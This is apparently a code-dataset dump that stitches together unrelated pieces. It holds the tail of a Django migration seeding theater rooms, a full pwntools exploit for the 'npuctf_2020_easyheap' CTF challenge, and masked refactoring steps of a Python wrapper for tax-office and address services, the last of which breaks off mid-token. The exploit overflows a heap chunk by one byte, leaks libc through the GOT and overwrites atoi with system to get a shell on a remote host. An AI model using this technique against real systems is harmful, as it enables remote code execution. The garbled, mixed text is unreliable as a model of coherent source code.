"step-3": "<mask token>\n\n\ndef forwards_func(apps, schema_editor):\n \"\"\" Add Theater Rooms \"\"\"\n TheaterRoom = apps.get_model('main', 'TheaterRoom')\n db_alias = schema_editor.connection.alias\n TheaterRoom.objects.using(db_alias).bulk_create([TheaterRoom(name=\n 'Red Room', rows_count=10, seats_per_row_count=15), TheaterRoom(\n name='Blue Room', rows_count=20, seats_per_row_count=30)])\n\n\ndef reverse_func(apps, schema_editor):\n \"\"\" No need to do anything since the table is dropped completely \"\"\"\n pass\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='TheaterRoom', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('name', models.CharField(max_length=20\n )), ('rows_count', models.IntegerField()), ('seats_per_row_count',\n models.IntegerField())]), migrations.RunPython(forwards_func,\n reverse_func)]\n",
"step-4": "from django.db import migrations, models\n\n\ndef forwards_func(apps, schema_editor):\n \"\"\" Add Theater Rooms \"\"\"\n TheaterRoom = apps.get_model('main', 'TheaterRoom')\n db_alias = schema_editor.connection.alias\n TheaterRoom.objects.using(db_alias).bulk_create([TheaterRoom(name=\n 'Red Room', rows_count=10, seats_per_row_count=15), TheaterRoom(\n name='Blue Room', rows_count=20, seats_per_row_count=30)])\n\n\ndef reverse_func(apps, schema_editor):\n \"\"\" No need to do anything since the table is dropped completely \"\"\"\n pass\n\n\nclass Migration(migrations.Migration):\n initial = True\n dependencies = []\n operations = [migrations.CreateModel(name='TheaterRoom', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('name', models.CharField(max_length=20\n )), ('rows_count', models.IntegerField()), ('seats_per_row_count',\n models.IntegerField())]), migrations.RunPython(forwards_func,\n reverse_func)]\n",
"step-5": "# Generated by Django 2.2.3 on 2019-07-14 13:34\n\nfrom django.db import migrations, models\n\n\ndef forwards_func(apps, schema_editor):\n \"\"\" Add Theater Rooms \"\"\"\n TheaterRoom = apps.get_model(\"main\", \"TheaterRoom\")\n db_alias = schema_editor.connection.alias\n TheaterRoom.objects.using(db_alias).bulk_create([\n TheaterRoom(name=\"Red Room\", rows_count=10, seats_per_row_count=15),\n TheaterRoom(name=\"Blue Room\", rows_count=20, seats_per_row_count=30),\n ])\n\n\ndef reverse_func(apps, schema_editor):\n \"\"\" No need to do anything since the table is dropped completely \"\"\"\n pass\n\n\nclass Migration(migrations.Migration):\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='TheaterRoom',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=20)),\n ('rows_count', models.IntegerField()),\n ('seats_per_row_count', models.IntegerField()),\n ],\n ),\n migrations.RunPython(forwards_func, reverse_func),\n ]\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
#+++++++++++++++++++exp.py++++++++++++++++++++
#!/usr/bin/python
# -*- coding:utf-8 -*-
#Author: Squarer
#Time: 2020.11.15 20.20.51
#+++++++++++++++++++exp.py++++++++++++++++++++
from pwn import*
#context.log_level = 'debug'
context.arch = 'amd64'
elf = ELF('./npuctf_2020_easyheap')
libc = ELF('./libc-2.27.so')
#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
#libc=ELF('/lib/i386-linux-gnu/libc.so.6')
def add(size,cont):
sh.sendlineafter('Your choice :','1')
sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ',str(size))
sh.sendlineafter('Content:',str(cont))
def edit(index,cont):
sh.sendlineafter('Your choice :','2')
sh.sendlineafter('Index :',str(index))
sh.sendafter('Content: ',str(cont))
def delete(index):
sh.sendlineafter('Your choice :','4')
sh.sendlineafter('Index :',str(index))
def show(index):
sh.sendlineafter('Your choice :','3')
sh.sendlineafter('Index :',str(index))
def show_addr(name,addr):
log.success('The '+str(name)+' Addr:' + str(hex(addr)))
sh = process('./npuctf_2020_easyheap')
sh = remote('node3.buuoj.cn',27634)
#extending
add(0x18,'A'*8)
add(0x18,'B'*8)
edit(0,'A'*0x18+'\x41')
delete(1)
#leaking
add(0x38,'A'*8) #1
payload = 'A'*0x10 + p64(0) + p64(0x21)
payload += p64(0x38) + p64(elf.got['atoi'])
edit(1,payload)
show(1)
sh.recvuntil('Content : ')
libc_addr = u64(sh.recv(6).ljust(8,'\x00')) - libc.sym['atoi']
system_addr = libc_addr + libc.sym['system']
show_addr('libc_addr',libc_addr)
show_addr('system_addr',system_addr)
#hijacking
edit(1,p64(system_addr))
#gdb.attach(sh,'b*0x400E6D')
sh.interactive()
|
normal
|
{
"blob_id": "eeedf4930a7fa58fd406a569db6281476c2e3e35",
"index": 4870,
"step-1": "<mask token>\n\n\ndef add(size, cont):\n sh.sendlineafter('Your choice :', '1')\n sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))\n sh.sendlineafter('Content:', str(cont))\n\n\ndef edit(index, cont):\n sh.sendlineafter('Your choice :', '2')\n sh.sendlineafter('Index :', str(index))\n sh.sendafter('Content: ', str(cont))\n\n\ndef delete(index):\n sh.sendlineafter('Your choice :', '4')\n sh.sendlineafter('Index :', str(index))\n\n\n<mask token>\n\n\ndef show_addr(name, addr):\n log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef add(size, cont):\n sh.sendlineafter('Your choice :', '1')\n sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))\n sh.sendlineafter('Content:', str(cont))\n\n\ndef edit(index, cont):\n sh.sendlineafter('Your choice :', '2')\n sh.sendlineafter('Index :', str(index))\n sh.sendafter('Content: ', str(cont))\n\n\ndef delete(index):\n sh.sendlineafter('Your choice :', '4')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show(index):\n sh.sendlineafter('Your choice :', '3')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show_addr(name, addr):\n log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))\n\n\n<mask token>\nadd(24, 'A' * 8)\nadd(24, 'B' * 8)\nedit(0, 'A' * 24 + 'A')\ndelete(1)\nadd(56, 'A' * 8)\n<mask token>\npayload += p64(56) + p64(elf.got['atoi'])\nedit(1, payload)\nshow(1)\nsh.recvuntil('Content : ')\n<mask token>\nshow_addr('libc_addr', libc_addr)\nshow_addr('system_addr', system_addr)\nedit(1, p64(system_addr))\nsh.interactive()\n",
"step-3": "<mask token>\ncontext.arch = 'amd64'\nelf = ELF('./npuctf_2020_easyheap')\nlibc = ELF('./libc-2.27.so')\n\n\ndef add(size, cont):\n sh.sendlineafter('Your choice :', '1')\n sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))\n sh.sendlineafter('Content:', str(cont))\n\n\ndef edit(index, cont):\n sh.sendlineafter('Your choice :', '2')\n sh.sendlineafter('Index :', str(index))\n sh.sendafter('Content: ', str(cont))\n\n\ndef delete(index):\n sh.sendlineafter('Your choice :', '4')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show(index):\n sh.sendlineafter('Your choice :', '3')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show_addr(name, addr):\n log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))\n\n\nsh = process('./npuctf_2020_easyheap')\nsh = remote('node3.buuoj.cn', 27634)\nadd(24, 'A' * 8)\nadd(24, 'B' * 8)\nedit(0, 'A' * 24 + 'A')\ndelete(1)\nadd(56, 'A' * 8)\npayload = 'A' * 16 + p64(0) + p64(33)\npayload += p64(56) + p64(elf.got['atoi'])\nedit(1, payload)\nshow(1)\nsh.recvuntil('Content : ')\nlibc_addr = u64(sh.recv(6).ljust(8, '\\x00')) - libc.sym['atoi']\nsystem_addr = libc_addr + libc.sym['system']\nshow_addr('libc_addr', libc_addr)\nshow_addr('system_addr', system_addr)\nedit(1, p64(system_addr))\nsh.interactive()\n",
"step-4": "from pwn import *\ncontext.arch = 'amd64'\nelf = ELF('./npuctf_2020_easyheap')\nlibc = ELF('./libc-2.27.so')\n\n\ndef add(size, cont):\n sh.sendlineafter('Your choice :', '1')\n sh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))\n sh.sendlineafter('Content:', str(cont))\n\n\ndef edit(index, cont):\n sh.sendlineafter('Your choice :', '2')\n sh.sendlineafter('Index :', str(index))\n sh.sendafter('Content: ', str(cont))\n\n\ndef delete(index):\n sh.sendlineafter('Your choice :', '4')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show(index):\n sh.sendlineafter('Your choice :', '3')\n sh.sendlineafter('Index :', str(index))\n\n\ndef show_addr(name, addr):\n log.success('The ' + str(name) + ' Addr:' + str(hex(addr)))\n\n\nsh = process('./npuctf_2020_easyheap')\nsh = remote('node3.buuoj.cn', 27634)\nadd(24, 'A' * 8)\nadd(24, 'B' * 8)\nedit(0, 'A' * 24 + 'A')\ndelete(1)\nadd(56, 'A' * 8)\npayload = 'A' * 16 + p64(0) + p64(33)\npayload += p64(56) + p64(elf.got['atoi'])\nedit(1, payload)\nshow(1)\nsh.recvuntil('Content : ')\nlibc_addr = u64(sh.recv(6).ljust(8, '\\x00')) - libc.sym['atoi']\nsystem_addr = libc_addr + libc.sym['system']\nshow_addr('libc_addr', libc_addr)\nshow_addr('system_addr', system_addr)\nedit(1, p64(system_addr))\nsh.interactive()\n",
"step-5": "#+++++++++++++++++++exp.py++++++++++++++++++++\n#!/usr/bin/python\n# -*- coding:utf-8 -*- \n#Author: Squarer\n#Time: 2020.11.15 20.20.51\n#+++++++++++++++++++exp.py++++++++++++++++++++\nfrom pwn import*\n\n#context.log_level = 'debug'\ncontext.arch = 'amd64'\n\nelf = ELF('./npuctf_2020_easyheap')\nlibc = ELF('./libc-2.27.so')\n#libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')\n#libc=ELF('/lib/i386-linux-gnu/libc.so.6')\n\ndef add(size,cont):\n\tsh.sendlineafter('Your choice :','1')\n\tsh.sendlineafter('Size of Heap(0x10 or 0x20 only) : ',str(size))\n\tsh.sendlineafter('Content:',str(cont))\n\ndef edit(index,cont):\n\tsh.sendlineafter('Your choice :','2')\n\tsh.sendlineafter('Index :',str(index))\n\tsh.sendafter('Content: ',str(cont))\n\ndef delete(index):\n\tsh.sendlineafter('Your choice :','4')\n\tsh.sendlineafter('Index :',str(index))\n\ndef show(index):\n\tsh.sendlineafter('Your choice :','3')\n\tsh.sendlineafter('Index :',str(index))\n\ndef show_addr(name,addr):\n\tlog.success('The '+str(name)+' Addr:' + str(hex(addr)))\n\nsh = process('./npuctf_2020_easyheap')\nsh = remote('node3.buuoj.cn',27634)\n\n#extending\nadd(0x18,'A'*8)\nadd(0x18,'B'*8)\nedit(0,'A'*0x18+'\\x41')\ndelete(1)\n\n#leaking\nadd(0x38,'A'*8) #1\npayload = 'A'*0x10 + p64(0) + p64(0x21)\npayload += p64(0x38) + p64(elf.got['atoi'])\nedit(1,payload)\n\nshow(1)\nsh.recvuntil('Content : ')\nlibc_addr = u64(sh.recv(6).ljust(8,'\\x00')) - libc.sym['atoi']\nsystem_addr = libc_addr + libc.sym['system']\nshow_addr('libc_addr',libc_addr)\nshow_addr('system_addr',system_addr)\n\n#hijacking\nedit(1,p64(system_addr))\n#gdb.attach(sh,'b*0x400E6D')\n\nsh.interactive()\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
<|reserved_special_token_0|>
def dadata_clean(method, data):
return dadata_proxy.dadata_clean(method, data)
def get_detailed_address(address):
from fw.utils.address_utils import get_detailed_address as _get_detailed_address
return _get_detailed_address(address)
def dadata_standardize_address(address):
from fw.utils.address_utils import dadata_standardize_address as _dadata_standardize_address
return _dadata_standardize_address(address)
def get_ifns_by_address(address, service_nalog_ru_url):
from services.ifns.ifns_manager import get_ifns_by_address as _get_ifns_by_address
return _get_ifns_by_address(address, service_nalog_ru_url)
<|reserved_special_token_0|>
def get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number,
internal_ifns_service, logger):
from services.ifns.ifns_manager import get_nalog_ru_time_slots as _get_nalog_ru_time_slots
return _get_nalog_ru_time_slots(person_data, company_data,
internal_ifns_number, internal_ifns_service, logger)
def book_ifns(person_data, company_data, internal_ifns_number,
internal_ifns_service, dt, logger):
from services.ifns.ifns_manager import book_ifns as _book_ifns
return _book_ifns(person_data, company_data, internal_ifns_number,
internal_ifns_service, dt, logger)
def get_registration_ifns(service_nalog_ru_url, address_ifns=None):
from services.ifns.ifns_manager import get_registration_ifns as _get_registration_ifns
return _get_registration_ifns(service_nalog_ru_url, address_ifns=
address_ifns)
def get_ifns_registrations(name, company_type='ooo', date_from=None,
date_to=None, service=None, ifns=None, service_nalog_ru_url=None,
logger=None):
from services.ifns.ifns_manager import get_ifns_registrations as _get_ifns_registrations
return _get_ifns_registrations(name, company_type=company_type,
date_from=date_from, date_to=date_to, service=service, ifns=ifns,
service_nalog_ru_url=service_nalog_ru_url, logger=logger)
def check_car_policy(policy_series, policy_number, timeout=20.0):
from services.car_assurance.integration import check_car_policy as _check_car_policy
return _check_car_policy(policy_series, policy_number, timeout=timeout)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def dadata_suggest(method, data):
return dadata_proxy.dadata_suggest(method, data)
def dadata_clean(method, data):
return dadata_proxy.dadata_clean(method, data)
def get_detailed_address(address):
from fw.utils.address_utils import get_detailed_address as _get_detailed_address
return _get_detailed_address(address)
def dadata_standardize_address(address):
from fw.utils.address_utils import dadata_standardize_address as _dadata_standardize_address
return _dadata_standardize_address(address)
def get_ifns_by_address(address, service_nalog_ru_url):
from services.ifns.ifns_manager import get_ifns_by_address as _get_ifns_by_address
return _get_ifns_by_address(address, service_nalog_ru_url)
def get_ifns_by_code(tax_office, service_nalog_ru_url):
from services.ifns.ifns_manager import get_ifns_by_code as _get_ifns_by_code
return _get_ifns_by_code(tax_office, service_nalog_ru_url)
def get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number,
internal_ifns_service, logger):
from services.ifns.ifns_manager import get_nalog_ru_time_slots as _get_nalog_ru_time_slots
return _get_nalog_ru_time_slots(person_data, company_data,
internal_ifns_number, internal_ifns_service, logger)
def book_ifns(person_data, company_data, internal_ifns_number,
internal_ifns_service, dt, logger):
from services.ifns.ifns_manager import book_ifns as _book_ifns
return _book_ifns(person_data, company_data, internal_ifns_number,
internal_ifns_service, dt, logger)
def get_registration_ifns(service_nalog_ru_url, address_ifns=None):
from services.ifns.ifns_manager import get_registration_ifns as _get_registration_ifns
return _get_registration_ifns(service_nalog_ru_url, address_ifns=
address_ifns)
def get_ifns_registrations(name, company_type='ooo', date_from=None,
date_to=None, service=None, ifns=None, service_nalog_ru_url=None,
logger=None):
from services.ifns.ifns_manager import get_ifns_registrations as _get_ifns_registrations
return _get_ifns_registrations(name, company_type=company_type,
date_from=date_from, date_to=date_to, service=service, ifns=ifns,
service_nalog_ru_url=service_nalog_ru_url, logger=logger)
def check_car_policy(policy_series, policy_number, timeout=20.0):
from services.car_assurance.integration import check_car_policy as _check_car_policy
return _check_car_policy(policy_series, policy_number, timeout=timeout)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
cache = CacheWrapper()
def dadata_suggest(method, data):
return dadata_proxy.dadata_suggest(method, data)
def dadata_clean(method, data):
return dadata_proxy.dadata_clean(method, data)
def get_detailed_address(address):
from fw.utils.address_utils import get_detailed_address as _get_detailed_address
return _get_detailed_address(address)
def dadata_standardize_address(address):
from fw.utils.address_utils import dadata_standardize_address as _dadata_standardize_address
return _dadata_standardize_address(address)
def get_ifns_by_address(address, service_nalog_ru_url):
from services.ifns.ifns_manager import get_ifns_by_address as _get_ifns_by_address
return _get_ifns_by_address(address, service_nalog_ru_url)
def get_ifns_by_code(tax_office, service_nalog_ru_url):
from services.ifns.ifns_manager import get_ifns_by_code as _get_ifns_by_code
return _get_ifns_by_code(tax_office, service_nalog_ru_url)
def get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number,
internal_ifns_service, logger):
from services.ifns.ifns_manager import get_nalog_ru_time_slots as _get_nalog_ru_time_slots
return _get_nalog_ru_time_slots(person_data, company_data,
internal_ifns_number, internal_ifns_service, logger)
def book_ifns(person_data, company_data, internal_ifns_number,
internal_ifns_service, dt, logger):
from services.ifns.ifns_manager import book_ifns as _book_ifns
return _book_ifns(person_data, company_data, internal_ifns_number,
internal_ifns_service, dt, logger)
def get_registration_ifns(service_nalog_ru_url, address_ifns=None):
from services.ifns.ifns_manager import get_registration_ifns as _get_registration_ifns
return _get_registration_ifns(service_nalog_ru_url, address_ifns=
address_ifns)
def get_ifns_registrations(name, company_type='ooo', date_from=None,
date_to=None, service=None, ifns=None, service_nalog_ru_url=None,
logger=None):
from services.ifns.ifns_manager import get_ifns_registrations as _get_ifns_registrations
return _get_ifns_registrations(name, company_type=company_type,
date_from=date_from, date_to=date_to, service=service, ifns=ifns,
service_nalog_ru_url=service_nalog_ru_url, logger=logger)
def check_car_policy(policy_series, policy_number, timeout=20.0):
from services.car_assurance.integration import check_car_policy as _check_car_policy
return _check_car_policy(policy_series, policy_number, timeout=timeout)
<|reserved_special_token_1|>
from fw.api import dadata_proxy
from flask import current_app
from fw.cache.cache_wrapper import CacheWrapper
cache = CacheWrapper()
def dadata_suggest(method, data):
return dadata_proxy.dadata_suggest(method, data)
def dadata_clean(method, data):
return dadata_proxy.dadata_clean(method, data)
def get_detailed_address(address):
from fw.utils.address_utils import get_detailed_address as _get_detailed_address
return _get_detailed_address(address)
def dadata_standardize_address(address):
from fw.utils.address_utils import dadata_standardize_address as _dadata_standardize_address
return _dadata_standardize_address(address)
def get_ifns_by_address(address, service_nalog_ru_url):
from services.ifns.ifns_manager import get_ifns_by_address as _get_ifns_by_address
return _get_ifns_by_address(address, service_nalog_ru_url)
def get_ifns_by_code(tax_office, service_nalog_ru_url):
from services.ifns.ifns_manager import get_ifns_by_code as _get_ifns_by_code
return _get_ifns_by_code(tax_office, service_nalog_ru_url)
def get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number,
internal_ifns_service, logger):
from services.ifns.ifns_manager import get_nalog_ru_time_slots as _get_nalog_ru_time_slots
return _get_nalog_ru_time_slots(person_data, company_data,
internal_ifns_number, internal_ifns_service, logger)
def book_ifns(person_data, company_data, internal_ifns_number,
internal_ifns_service, dt, logger):
from services.ifns.ifns_manager import book_ifns as _book_ifns
return _book_ifns(person_data, company_data, internal_ifns_number,
internal_ifns_service, dt, logger)
def get_registration_ifns(service_nalog_ru_url, address_ifns=None):
from services.ifns.ifns_manager import get_registration_ifns as _get_registration_ifns
return _get_registration_ifns(service_nalog_ru_url, address_ifns=
address_ifns)
def get_ifns_registrations(name, company_type='ooo', date_from=None,
date_to=None, service=None, ifns=None, service_nalog_ru_url=None,
logger=None):
from services.ifns.ifns_manager import get_ifns_registrations as _get_ifns_registrations
return _get_ifns_registrations(name, company_type=company_type,
date_from=date_from, date_to=date_to, service=service, ifns=ifns,
service_nalog_ru_url=service_nalog_ru_url, logger=logger)
def check_car_policy(policy_series, policy_number, timeout=20.0):
from services.car_assurance.integration import check_car_policy as _check_car_policy
return _check_car_policy(policy_series, policy_number, timeout=timeout)
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
from fw.api import dadata_proxy
from flask import current_app
from fw.cache.cache_wrapper import CacheWrapper
cache = CacheWrapper()
def dadata_suggest(method, data):
return dadata_proxy.dadata_suggest(method, data)
def dadata_clean(method, data):
return dadata_proxy.dadata_clean(method, data)
def get_detailed_address(address):
from fw.utils.address_utils import get_detailed_address as _get_detailed_address
return _get_detailed_address(address)
def dadata_standardize_address(address):
from fw.utils.address_utils import dadata_standardize_address as _dadata_standardize_address
return _dadata_standardize_address(address)
def get_ifns_by_address(address, service_nalog_ru_url):
from services.ifns.ifns_manager import get_ifns_by_address as _get_ifns_by_address
return _get_ifns_by_address(address, service_nalog_ru_url)
def get_ifns_by_code(tax_office, service_nalog_ru_url):
from services.ifns.ifns_manager import get_ifns_by_code as _get_ifns_by_code
return _get_ifns_by_code(tax_office, service_nalog_ru_url)
def get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number, internal_ifns_service, logger):
from services.ifns.ifns_manager import get_nalog_ru_time_slots as _get_nalog_ru_time_slots
return _get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number, internal_ifns_service, logger)
def book_ifns(person_data, company_data, internal_ifns_number, internal_ifns_service, dt, logger):
from services.ifns.ifns_manager import book_ifns as _book_ifns
return _book_ifns(person_data, company_data, internal_ifns_number, internal_ifns_service, dt, logger)
def get_registration_ifns(service_nalog_ru_url, address_ifns=None):
from services.ifns.ifns_manager import get_registration_ifns as _get_registration_ifns
return _get_registration_ifns(service_nalog_ru_url, address_ifns=address_ifns)
def get_ifns_registrations(name, company_type='ooo', date_from=None, date_to=None,
service=None, ifns=None, service_nalog_ru_url=None, logger=None):
from services.ifns.ifns_manager import get_ifns_registrations as _get_ifns_registrations
return _get_ifns_registrations(name, company_type=company_type, date_from=date_from, date_to=date_to,
service=service, ifns=ifns, service_nalog_ru_url=service_nalog_ru_url, logger=logger)
def check_car_policy(policy_series, policy_number, timeout=20.0):
from services.car_assurance.integration import check_car_policy as _check_car_policy
return _check_car_policy(policy_series, policy_number, timeout=timeout)
|
flexible
|
{
"blob_id": "af4d2380f92ea636594695e5ad4ba766d6874dd3",
"index": 1355,
"step-1": "<mask token>\n\n\ndef dadata_clean(method, data):\n return dadata_proxy.dadata_clean(method, data)\n\n\ndef get_detailed_address(address):\n from fw.utils.address_utils import get_detailed_address as _get_detailed_address\n return _get_detailed_address(address)\n\n\ndef dadata_standardize_address(address):\n from fw.utils.address_utils import dadata_standardize_address as _dadata_standardize_address\n return _dadata_standardize_address(address)\n\n\ndef get_ifns_by_address(address, service_nalog_ru_url):\n from services.ifns.ifns_manager import get_ifns_by_address as _get_ifns_by_address\n return _get_ifns_by_address(address, service_nalog_ru_url)\n\n\n<mask token>\n\n\ndef get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number,\n internal_ifns_service, logger):\n from services.ifns.ifns_manager import get_nalog_ru_time_slots as _get_nalog_ru_time_slots\n return _get_nalog_ru_time_slots(person_data, company_data,\n internal_ifns_number, internal_ifns_service, logger)\n\n\ndef book_ifns(person_data, company_data, internal_ifns_number,\n internal_ifns_service, dt, logger):\n from services.ifns.ifns_manager import book_ifns as _book_ifns\n return _book_ifns(person_data, company_data, internal_ifns_number,\n internal_ifns_service, dt, logger)\n\n\ndef get_registration_ifns(service_nalog_ru_url, address_ifns=None):\n from services.ifns.ifns_manager import get_registration_ifns as _get_registration_ifns\n return _get_registration_ifns(service_nalog_ru_url, address_ifns=\n address_ifns)\n\n\ndef get_ifns_registrations(name, company_type='ooo', date_from=None,\n date_to=None, service=None, ifns=None, service_nalog_ru_url=None,\n logger=None):\n from services.ifns.ifns_manager import get_ifns_registrations as _get_ifns_registrations\n return _get_ifns_registrations(name, company_type=company_type,\n date_from=date_from, date_to=date_to, service=service, ifns=ifns,\n service_nalog_ru_url=service_nalog_ru_url, logger=logger)\n\n\ndef check_car_policy(policy_series, policy_number, timeout=20.0):\n from services.car_assurance.integration import check_car_policy as _check_car_policy\n return _check_car_policy(policy_series, policy_number, timeout=timeout)\n",
"step-2": "<mask token>\n\n\ndef dadata_suggest(method, data):\n return dadata_proxy.dadata_suggest(method, data)\n\n\ndef dadata_clean(method, data):\n return dadata_proxy.dadata_clean(method, data)\n\n\ndef get_detailed_address(address):\n from fw.utils.address_utils import get_detailed_address as _get_detailed_address\n return _get_detailed_address(address)\n\n\ndef dadata_standardize_address(address):\n from fw.utils.address_utils import dadata_standardize_address as _dadata_standardize_address\n return _dadata_standardize_address(address)\n\n\ndef get_ifns_by_address(address, service_nalog_ru_url):\n from services.ifns.ifns_manager import get_ifns_by_address as _get_ifns_by_address\n return _get_ifns_by_address(address, service_nalog_ru_url)\n\n\ndef get_ifns_by_code(tax_office, service_nalog_ru_url):\n from services.ifns.ifns_manager import get_ifns_by_code as _get_ifns_by_code\n return _get_ifns_by_code(tax_office, service_nalog_ru_url)\n\n\ndef get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number,\n internal_ifns_service, logger):\n from services.ifns.ifns_manager import get_nalog_ru_time_slots as _get_nalog_ru_time_slots\n return _get_nalog_ru_time_slots(person_data, company_data,\n internal_ifns_number, internal_ifns_service, logger)\n\n\ndef book_ifns(person_data, company_data, internal_ifns_number,\n internal_ifns_service, dt, logger):\n from services.ifns.ifns_manager import book_ifns as _book_ifns\n return _book_ifns(person_data, company_data, internal_ifns_number,\n internal_ifns_service, dt, logger)\n\n\ndef get_registration_ifns(service_nalog_ru_url, address_ifns=None):\n from services.ifns.ifns_manager import get_registration_ifns as _get_registration_ifns\n return _get_registration_ifns(service_nalog_ru_url, address_ifns=\n address_ifns)\n\n\ndef get_ifns_registrations(name, company_type='ooo', date_from=None,\n date_to=None, service=None, ifns=None, service_nalog_ru_url=None,\n logger=None):\n from services.ifns.ifns_manager import get_ifns_registrations as _get_ifns_registrations\n return _get_ifns_registrations(name, company_type=company_type,\n date_from=date_from, date_to=date_to, service=service, ifns=ifns,\n service_nalog_ru_url=service_nalog_ru_url, logger=logger)\n\n\ndef check_car_policy(policy_series, policy_number, timeout=20.0):\n from services.car_assurance.integration import check_car_policy as _check_car_policy\n return _check_car_policy(policy_series, policy_number, timeout=timeout)\n",
"step-3": "<mask token>\ncache = CacheWrapper()\n\n\ndef dadata_suggest(method, data):\n return dadata_proxy.dadata_suggest(method, data)\n\n\ndef dadata_clean(method, data):\n return dadata_proxy.dadata_clean(method, data)\n\n\ndef get_detailed_address(address):\n from fw.utils.address_utils import get_detailed_address as _get_detailed_address\n return _get_detailed_address(address)\n\n\ndef dadata_standardize_address(address):\n from fw.utils.address_utils import dadata_standardize_address as _dadata_standardize_address\n return _dadata_standardize_address(address)\n\n\ndef get_ifns_by_address(address, service_nalog_ru_url):\n from services.ifns.ifns_manager import get_ifns_by_address as _get_ifns_by_address\n return _get_ifns_by_address(address, service_nalog_ru_url)\n\n\ndef get_ifns_by_code(tax_office, service_nalog_ru_url):\n from services.ifns.ifns_manager import get_ifns_by_code as _get_ifns_by_code\n return _get_ifns_by_code(tax_office, service_nalog_ru_url)\n\n\ndef get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number,\n internal_ifns_service, logger):\n from services.ifns.ifns_manager import get_nalog_ru_time_slots as _get_nalog_ru_time_slots\n return _get_nalog_ru_time_slots(person_data, company_data,\n internal_ifns_number, internal_ifns_service, logger)\n\n\ndef book_ifns(person_data, company_data, internal_ifns_number,\n internal_ifns_service, dt, logger):\n from services.ifns.ifns_manager import book_ifns as _book_ifns\n return _book_ifns(person_data, company_data, internal_ifns_number,\n internal_ifns_service, dt, logger)\n\n\ndef get_registration_ifns(service_nalog_ru_url, address_ifns=None):\n from services.ifns.ifns_manager import get_registration_ifns as _get_registration_ifns\n return _get_registration_ifns(service_nalog_ru_url, address_ifns=\n address_ifns)\n\n\ndef get_ifns_registrations(name, company_type='ooo', date_from=None,\n date_to=None, service=None, ifns=None, service_nalog_ru_url=None,\n logger=None):\n from services.ifns.ifns_manager import get_ifns_registrations as _get_ifns_registrations\n return _get_ifns_registrations(name, company_type=company_type,\n date_from=date_from, date_to=date_to, service=service, ifns=ifns,\n service_nalog_ru_url=service_nalog_ru_url, logger=logger)\n\n\ndef check_car_policy(policy_series, policy_number, timeout=20.0):\n from services.car_assurance.integration import check_car_policy as _check_car_policy\n return _check_car_policy(policy_series, policy_number, timeout=timeout)\n",
"step-4": "from fw.api import dadata_proxy\nfrom flask import current_app\nfrom fw.cache.cache_wrapper import CacheWrapper\ncache = CacheWrapper()\n\n\ndef dadata_suggest(method, data):\n return dadata_proxy.dadata_suggest(method, data)\n\n\ndef dadata_clean(method, data):\n return dadata_proxy.dadata_clean(method, data)\n\n\ndef get_detailed_address(address):\n from fw.utils.address_utils import get_detailed_address as _get_detailed_address\n return _get_detailed_address(address)\n\n\ndef dadata_standardize_address(address):\n from fw.utils.address_utils import dadata_standardize_address as _dadata_standardize_address\n return _dadata_standardize_address(address)\n\n\ndef get_ifns_by_address(address, service_nalog_ru_url):\n from services.ifns.ifns_manager import get_ifns_by_address as _get_ifns_by_address\n return _get_ifns_by_address(address, service_nalog_ru_url)\n\n\ndef get_ifns_by_code(tax_office, service_nalog_ru_url):\n from services.ifns.ifns_manager import get_ifns_by_code as _get_ifns_by_code\n return _get_ifns_by_code(tax_office, service_nalog_ru_url)\n\n\ndef get_nalog_ru_time_slots(person_data, company_data, internal_ifns_number,\n internal_ifns_service, logger):\n from services.ifns.ifns_manager import get_nalog_ru_time_slots as _get_nalog_ru_time_slots\n return _get_nalog_ru_time_slots(person_data, company_data,\n internal_ifns_number, internal_ifns_service, logger)\n\n\ndef book_ifns(person_data, company_data, internal_ifns_number,\n internal_ifns_service, dt, logger):\n from services.ifns.ifns_manager import book_ifns as _book_ifns\n return _book_ifns(person_data, company_data, internal_ifns_number,\n internal_ifns_service, dt, logger)\n\n\ndef get_registration_ifns(service_nalog_ru_url, address_ifns=None):\n from services.ifns.ifns_manager import get_registration_ifns as _get_registration_ifns\n return _get_registration_ifns(service_nalog_ru_url, address_ifns=\n address_ifns)\n\n\ndef get_ifns_registrations(name, company_type='ooo', date_from=None,\n date_to=None, service=None, ifns=None, service_nalog_ru_url=None,\n logger=None):\n from services.ifns.ifns_manager import get_ifns_registrations as _get_ifns_registrations\n return _get_ifns_registrations(name, company_type=company_type,\n date_from=date_from, date_to=date_to, service=service, ifns=ifns,\n service_nalog_ru_url=service_nalog_ru_url, logger=logger)\n\n\ndef 